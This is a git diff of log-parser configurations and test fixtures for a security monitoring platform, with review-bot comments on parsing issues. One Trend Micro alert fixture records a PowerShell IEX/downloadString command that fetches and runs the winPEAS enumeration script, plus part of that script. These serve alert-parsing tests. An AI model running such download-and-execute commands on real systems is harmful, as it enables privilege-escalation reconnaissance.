\"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", 
\"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 
'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n 
}\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], 
\"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Possible Web Service Abuse", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:45:28Z", 
+ "action": { + "properties": { + "ScriptBlockText": "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" + } + }, + "host": { + "id": "e930412e-e09c-454b-a508-576ba266b9d8", + "ip": [ + "20.193.45.33" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + ], + "ip": [ + "20.193.45.33" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Possible Web Service Abuse" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Umbrella/umbrella-proxy/ingest/parser.yml b/Umbrella/umbrella-proxy/ingest/parser.yml index 790c57048..442c5da45 100644 --- a/Umbrella/umbrella-proxy/ingest/parser.yml +++ b/Umbrella/umbrella-proxy/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "event.message.http_request_url" output_field: message pattern: "(%{URIPROTO:url_scheme}://)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 1e4a81657..45923af39 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml 
+++ b/VadeSecure/vade_secure_m365/_meta/fields.yml
@@ -58,6 +58,22 @@ vadesecure.attachments:
 short: vadesecure.to_header
 type: array
 
+vadesecure.auth_results_details.dkim:
+ description: The result of the DomainKeys Identified Mail (DKIM)
+ name: vadesecure.auth_results_details.dkim
+ type: keyword
+
+vadesecure.auth_results_details.dmarc:
+ description: Result of the Domand-based Message Authentication Reporting and Conformance
+ (DMARC)
+ name: vadesecure.auth_results_details.dmarc
+ type: keyword
+
+vadesecure.auth_results_details.spf:
+ description: The result of the Sender Policy Framework (SPF)
+ name: vadesecure.auth_results_details.spf
+ type: keyword
+
 vadesecure.campaign.actions:
 description: The actions carried out for the remediation campaign.
 name: vadesecure.campaign.actions
diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml
index 8c6e799a6..49acafa59 100644
--- a/VadeSecure/vade_secure_m365/_meta/manifest.yml
+++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml
@@ -1,6 +1,8 @@
 uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232
 name: Vade for M365
 slug: vade-m365
+automation_connector_uuid: d3860745-4433-4690-b025-378369ad7201
+automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff
 description: >-
 Vade for M365 offers all protections from Vade to our Microsoft 365 Email service
 data_sources:
diff --git a/VadeSecure/vade_secure_m365/ingest/parser.yml b/VadeSecure/vade_secure_m365/ingest/parser.yml
index 539de1df4..cbac9cd2d 100644
--- a/VadeSecure/vade_secure_m365/ingest/parser.yml
+++ b/VadeSecure/vade_secure_m365/ingest/parser.yml
@@ -56,6 +56,7 @@ stages:
 actions:
 - name: set
 set:
+ vadesecure.auth_results_details: "{{parse_json.message.auth_results_details}}"
 vadesecure.folder: "{{parse_json.message.folder}}"
 vadesecure.from_header: "{{parse_json.message.from_header}}"
 vadesecure.to_header: "{{parse_json.message.to_header}}"
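Review bot: The DMARC entry at `+ description: Result of the Domand-based Message Authentication Reporting and Conformance` misspells the acronym expansion; it should read `description: Result of the Domain-based Message Authentication, Reporting and Conformance (DMARC) check`. The three descriptions also differ in form ("The result of the ..." vs "Result of the ...") and none says what the values look like; naming the verdict strings the new fixtures carry (`none`, `fail`, `temperror`) would let rule authors match on them without reading test data.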
@@ -131,3 +132,7 @@ stages:
 - set:
 source.ip: "{{parse_json.message.sender_ip}}"
 filter: "{{parse_json.message.sender_ip| is_ipaddress}}"
+
+ - set:
+ email.reply_to.address: "{{parse_json.message.reply_to_header}}"
+ filter: "{{parse_json.message.reply_to_header != ''}}"
diff --git a/VadeSecure/vade_secure_m365/tests/email_02.json b/VadeSecure/vade_secure_m365/tests/email_02.json
new file mode 100644
index 000000000..7b2c0ae83
--- /dev/null
+++ b/VadeSecure/vade_secure_m365/tests/email_02.json
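Review bot: `email.reply_to.address` is set straight from `reply_to_header`, but the sibling `from_header`/`to_header` fields of this intake carry display-name forms (the fixtures show `John Doe`, `Alan Smithee `), so a Reply-To header with a display name would land in an ECS address field unparsed; the `!= ''` filter only guards the empty case. If the vendor guarantees a bare address here, say so in a comment on the stage; otherwise extract the address part before the `set:`, the way the `sender_ip` stage just above validates with `is_ipaddress`. The new fixture only exercises the bare-address case (`user@company.com`). Whether the template tolerates a payload without `reply_to_header` at all I cannot tell from the hunk.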
@@ -0,0 +1,61 @@ +{ + "input": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": 
\"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [], + "from": { + "address": "jd@doe.fr" + }, + "local_id": "cs72a9b6r0glddhdfh7g", + "message_id": "", + "reply_to": { + "address": "user@company.com" + }, + "subject": "Informations", + "to": { + "address": "alan.smithee@doe.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [], + "auth_results_details": { + "dkim": "none", + "dmarc": "fail", + "spf": "temperror" + }, + "from_header": "John Doe", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan.smithee@doe.fr", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json new file mode 100644 index 000000000..679e24c56 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json 
@@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], 
\"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [ + { + "file": { + "extension": "jpg", + "hash": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + }, + "name": "image001.jpg", + "size": 5130 + } + } + ], + "from": { + "address": "john.doe@mail.fr" + }, + "local_id": "csb6q1pgfisg9knp1l5g", + "message_id": "", + "subject": "Re: Your mail", + "to": { + "address": "alan.smithee@company.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [ + { + 
"filename": "image001.jpg", + "id": "12345678901234567890" + } + ], + "auth_results_details": { + "dkim": "fail", + "dmarc": "none", + "spf": "temperror" + }, + "from_header": "John DOE ", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan Smithee ", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/Veeam/veeam_backup/ingest/parser.yml b/Veeam/veeam_backup/ingest/parser.yml index 5470c716c..7054d0a51 100644 --- a/Veeam/veeam_backup/ingest/parser.yml +++ b/Veeam/veeam_backup/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.UserName}}" output_field: user pattern: '%{GREEDYDATA:domain}\\%{GREEDYDATA:name}' diff --git a/Wallix/wallix-bastion/ingest/parser.yml b/Wallix/wallix-bastion/ingest/parser.yml index ed76d3f43..d9f1be434 100644 --- a/Wallix/wallix-bastion/ingest/parser.yml +++ b/Wallix/wallix-bastion/ingest/parser.yml @@ -2,6 +2,7 @@ name: wallix-bastion ignored_values: ["-"] pipeline: - name: parsed_event + filter: '{{not original.message.startswith("pam_unix(")}}' external: name: kv.parse-kv properties: diff --git a/Wallix/wallix-bastion/tests/cron.json b/Wallix/wallix-bastion/tests/cron.json index da4487e2e..fdb9da3bc 100644 --- a/Wallix/wallix-bastion/tests/cron.json +++ b/Wallix/wallix-bastion/tests/cron.json @@ -15,7 +15,6 @@ }, "user": { "name": "root" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/pam_unix.json b/Wallix/wallix-bastion/tests/pam_unix.json index 5dd28b147..d7ce961b4 100644 --- a/Wallix/wallix-bastion/tests/pam_unix.json +++ b/Wallix/wallix-bastion/tests/pam_unix.json @@ -15,7 +15,6 @@ }, "user": { "name": "wabuser" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/rexec.json b/Wallix/wallix-bastion/tests/rexec.json deleted file mode 100644 index 14e87bd1a..000000000 
--- a/Wallix/wallix-bastion/tests/rexec.json
+++ /dev/null
@@ -1,12 +0,0 @@
-{
- "input": {
- "message": "rexec line 15: Deprecated option UsePrivilegeSeparation"
- },
- "expected": {
- "message": "rexec line 15: Deprecated option UsePrivilegeSeparation",
- "event": {
- "provider": "sshd"
- },
- "wallix": {}
- }
-}
\ No newline at end of file
diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json
index 39e8a6363..1c01481e9 100644
--- a/Wallix/wallix-bastion/tests/session_integrity.json
+++ b/Wallix/wallix-bastion/tests/session_integrity.json
@@ -6,13 +6,19 @@
"message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]",
"event": {
"action": "SSH_SHELL_SESSION",
- "category": ["session"],
+ "category": [
+ "session"
+ ],
"dataset": "session_integrity",
"outcome": "failure",
- "type": ["info"]
+ "type": [
+ "info"
+ ]
},
"related": {
- "user": ["adm@CORP.NET@1.1.1.1"]
+ "user": [
+ "adm@CORP.NET@1.1.1.1"
+ ]
},
"user": {
"name": "adm@CORP.NET@1.1.1.1"
@@ -21,4 +27,4 @@
"type": "SSH_SHELL_SESSION"
}
}
-}
+}
\ No newline at end of file
diff --git a/WatchGuard/watchguard-firebox/ingest/parser.yml b/WatchGuard/watchguard-firebox/ingest/parser.yml
index 23bdfd0d6..36e32c512 100644
--- a/WatchGuard/watchguard-firebox/ingest/parser.yml
+++ b/WatchGuard/watchguard-firebox/ingest/parser.yml
@@ -14,6 +14,7 @@ pipeline:
external:
name: grok.match
properties:
+ raise_errors: false
input_field: "{{parsed_event.message.msg}}"
output_field: message
pattern: "%{DHCP}|%{USER_LOG}"
diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 988ae3dbc..80474d3ce 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -24,6 +24,7 @@ pipeline:
external:
name: kv.parse-kv
properties:
+ raise_errors: false
input_field: "{{json.event.Message}}"
output_field: result
value_sep: ":"
@@ -35,6 +36,7 @@ pipeline:
external:
name: kv.parse-kv
properties:
+ raise_errors: false
input_field: "{{json.event.Hashes or json.event.Hash}}"
output_field: result
value_sep: "="
@@ -46,6 +48,7 @@ pipeline:
external:
name: kv.parse-kv
properties:
+ raise_errors: false
input_field: "{{json.event.Hashes or json.event.Hash}}"
output_field: result
value_sep: ":"
@@ -84,6 +87,7 @@ pipeline:
external:
name: grok.match
properties:
+ raise_errors: false
input_field: "{{json.event.IpAddress}}"
output_field: event
pattern: "%{GREEDYDATA}%{IPV4:ip}%{GREEDYDATA}"
@@ -94,6 +98,7 @@ pipeline:
external:
name: grok.match
properties:
+ raise_errors: false
input_field: "{{parsed_message_kv.result.Contents}}"
output_field: event
pattern: >-
@@ -105,6 +110,7 @@ pipeline:
external:
name: grok.match
properties:
+ raise_errors: false
input_field: "{{json.event.url or json.event.RemoteName}}"
output_field: event
pattern: >-
@@ -116,6 +122,7 @@ pipeline:
name: grok.match
description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format.
properties:
+ raise_errors: false
input_field: '{{json.event.ContextInfo.replace(" "," ").replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}'
output_field: event
pattern: "%{CONTEXTINFO_FR}|%{CONTEXTINFO_EN}"
@@ -128,6 +135,7 @@ pipeline:
external:
name: grok.match
properties:
+ raise_errors: false
input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}'
output_field: result
pattern: >-
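Review bot: The `IpAddress` grok in the `@@ -84,6 +87,7 @@` hunk matches only `%{IPV4:ip}`, so once `raise_errors: false` is set an IPv6 `IpAddress` (or the `-` that Windows logon events often carry when no address is known) no longer errors but silently leaves `event.ip` unset, and with it, presumably, the `source.ip` that the later `set_source_fields` stage copies from `source_ip_ip_address.event.ip`. Consider `pattern: "%{GREEDYDATA}%{IP:ip}%{GREEDYDATA}"` if the engine's grok library ships the standard `IP` pattern (IPv4 or IPv6), so IPv6 logons keep their source address rather than being dropped from any rule keyed on `source.ip`. The stage's name and the block scalars that follow `pattern: >-` in the neighbouring hunks are outside the visible lines.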
@@ -139,6 +147,7 @@ pipeline:
external:
name: grok.match
properties:
+ raise_errors: false
input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}'
output_field: event
pattern: >-
@@ -153,8 +162,7 @@ pipeline:
- name: set_file
- name: set_user
- name: process_ids
- - name: source_ip
- - name: source_address
+ - name: set_source_fields
- name: action_outcome
- name: set_dll
filter: "{{ json.event.SourceName == 'Microsoft-Windows-Sysmon' and json.event.EventID == 7}}"
@@ -165,6 +173,8 @@ pipeline:
- name: dns_fields
- name: action_target
- name: destination
+ - name: set_network_policy_fields
+ filter: "{{ json.event.SourceName == 'Microsoft-Windows-Security-Auditing' and json.event.EventID in [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280]}}"
- name: rule
- name: finalize
@@ -1106,7 +1116,7 @@ stages:
action.outcome: "failure"
filter: "{{json.event.EventType == 'AUDIT_FAILURE' }}"
- source_ip:
+ set_source_fields:
actions:
- set:
source.ip: "{{json.event.SourceIp or json.event.SourceAddress}}"
@@ -1131,8 +1141,6 @@ stages:
- set:
source.ip: "{{source_ip_ip_address.event.ip}}"
- source_address:
- actions:
- set:
source.address: "{{json.event.SourceIp}}"
filter: "{{json.event.SourceIp | is_ipaddress}}"
@@ -1153,6 +1161,17 @@ stages:
source.address: "{{json_event.message.SourceAddr}}"
